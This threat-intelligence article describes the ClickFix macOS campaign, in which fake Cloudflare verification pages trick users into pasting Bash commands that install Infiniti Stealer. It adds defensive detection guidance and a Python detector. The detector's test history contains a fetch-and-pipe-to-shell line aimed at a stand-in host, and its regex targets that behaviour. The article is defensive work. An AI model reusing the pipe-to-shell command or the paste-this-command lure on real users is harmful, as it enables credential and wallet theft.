ClickFix Social Engineering Drops Infiniti Stealer on macOS
- [01] macOS users face credential and cryptocurrency theft from a social engineering campaign using fake Cloudflare verification pages.
- [02] Affected systems include macOS devices where users are tricked into executing malicious Bash commands directly in the terminal application.
- [03] Defenders must block known malicious domains and educate users never to paste terminal commands from web-based verification prompts.
Overview of the ClickFix macOS Campaign
A sophisticated social engineering campaign, dubbed “ClickFix,” has expanded its reach to target macOS users with a Python-based information stealer known as Infiniti Stealer. This campaign leverages the brand reputation of Cloudflare to trick users into executing malicious code on their local machines. According to SecurityWeek, the attack begins when a user encounters a compromised website displaying a fake CAPTCHA or “human verification” prompt.
This phishing tactic relies on a psychological trick: the victim is told that the automated verification has failed. To proceed, the user is instructed to copy a pre-generated command to their clipboard, open their terminal, and paste the command for "manual verification." This TTP is particularly dangerous because it bypasses the browser's sandbox and other browser-based security controls entirely by moving execution to the operating system's command-line interface.
Technical Analysis of the Infiniti Stealer Infection Chain
The infection begins with a fake Cloudflare-themed popup. When the user follows the instructions to "Verify you are human," they are actually copying an encoded Bash command. Once executed in the Terminal, this command initiates a multi-stage download process. The first stage typically involves a simple script that fetches a more complex payload from a remote C2 server.
The payload delivered in this campaign is a loader compiled with Nuitka, a tool that translates Python code into C++ to create a standalone executable. This technique is often used by malware authors to hinder static analysis and make the binary more difficult for EDR solutions to inspect. The loader then deploys Infiniti Stealer, which is specifically designed to exfiltrate sensitive data from macOS environments.
Infiniti Stealer targets a wide range of information, including:
- Browser cookies and saved credentials from Chrome, Firefox, and Safari.
- Discord tokens and session information.
- Cryptocurrency wallet data and private keys.
- System metadata and hardware specifications.
How to detect ClickFix malware on macOS
Security teams looking to detect ClickFix activity on macOS should focus on process monitoring. Specifically, defenders should look for instances where a browser process (such as Google Chrome or Safari) is the parent of a Terminal.app or bash/zsh process that immediately executes a network-facing command like curl or wget. Under normal circumstances, users rarely copy commands from a webpage to resolve a CAPTCHA, making this behavior a high-fidelity indicator.
Furthermore, monitoring for the execution of binaries compiled with Nuitka in user-writable directories (e.g., /tmp/ or ~/Library/Application Support/) can provide an additional layer of detection. These binaries often exhibit suspicious MITRE ATT&CK behaviors such as credential dumping and system information discovery.
Analysis of the Infiniti Stealer macOS detection
When assessing a SOC's ability to detect Infiniti Stealer on macOS, it is vital to correlate network traffic with process execution. The malware frequently communicates with known malicious domains or IP addresses associated with the ClickFix infrastructure. Blocking these domains at the DNS level can prevent the initial script from fetching the Nuitka loader.
Because this attack relies on user interaction rather than a software CVE, traditional patching is ineffective. Instead, organizations should adopt Zero Trust principles by limiting the permissions of standard users, ensuring they cannot execute commands that modify system-level configurations without an administrative privilege-escalation prompt.
Mitigation and Defense Strategies
To defend against ClickFix and Infiniti Stealer, organizations must combine technical controls with robust user awareness training. Users must be educated on the risks of copying and pasting commands into the terminal, especially those originating from web-based “verification” prompts.
From a technical perspective, administrators should:
- Deploy EDR solutions configured to alert on suspicious shell command execution initiated by web browsers.
- Implement content filtering to block known ClickFix delivery domains.
- Monitor for unauthorized exfiltration of keychain data or browser profile folders.
- Review terminal history logs for unusual curl commands that pipe output directly into a shell (e.g., curl ... | bash).
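The two behavioral checks above, the browser-to-shell-to-curl process ancestry from the detection section and the history review for commands that pipe curl output into a shell, as an added example that is not from the original article or any vendor product. It assumes endpoint telemetry that exposes (pid, ppid, process name) tuples as the article describes; the process events, history lines and example.invalid hostnames are constructed.

```python
import re
# Process names in the chain the article describes: browser -> terminal/shell -> network tool.
BROWSERS = {"Google Chrome", "Safari", "firefox"}
SHELLS = {"Terminal", "bash", "zsh", "sh"}
NET_TOOLS = {"curl", "wget"}
# History pattern for "fetch remote content and pipe it straight into a shell".
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(sudo\s+)?(ba|z)?sh\b")
# Constructed sample process events (pid, ppid, name); not real telemetry.
EVENTS = [
    (1, 0, "launchd"),
    (200, 1, "Safari"),
    (300, 200, "Terminal"),  # terminal spawned beneath the browser
    (301, 300, "zsh"),
    (302, 301, "curl"),      # suspicious: curl under a browser-spawned shell
    (400, 1, "Terminal"),    # benign: terminal opened by the user from launchd
    (401, 400, "zsh"),
    (402, 401, "curl"),      # benign: developer fetching a file
]
# Constructed shell-history sample, not captured from a real victim.
HISTORY = [
    "ls -la ~/Downloads",
    "curl -fsSL http://verify.example.invalid/check | bash",
    "curl -O https://example.invalid/release.tar.gz",
]

def ancestry(pid, by_pid):
    """Process names from pid up to the root, starting with pid itself."""
    names = []
    while pid in by_pid:
        ppid, name = by_pid[pid]
        names.append(name)
        pid = ppid
    return names

def find_browser_to_shell_chains(events):
    """Flag curl/wget whose ancestors include a shell that sits beneath a browser."""
    by_pid = {pid: (ppid, name) for pid, ppid, name in events}
    hits = []
    for pid, _, name in events:
        if name not in NET_TOOLS:
            continue
        chain = ancestry(pid, by_pid)
        shell_idx = next((i for i, n in enumerate(chain[1:], 1) if n in SHELLS), None)
        if shell_idx is not None and any(n in BROWSERS for n in chain[shell_idx:]):
            hits.append((pid, " <- ".join(chain)))
    return hits

def find_pipe_to_shell(history_lines):
    """History lines that fetch remote content and pipe it into a shell."""
    return [line for line in history_lines if PIPE_TO_SHELL.search(line)]
```

Only the curl whose ancestry passes through a shell beneath Safari is flagged; the developer's curl under a normally opened Terminal is not, which is what keeps the rule low-noise.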
By focusing on the behavioral patterns of the ClickFix campaign, security professionals can identify and remediate these threats before significant data loss occurs.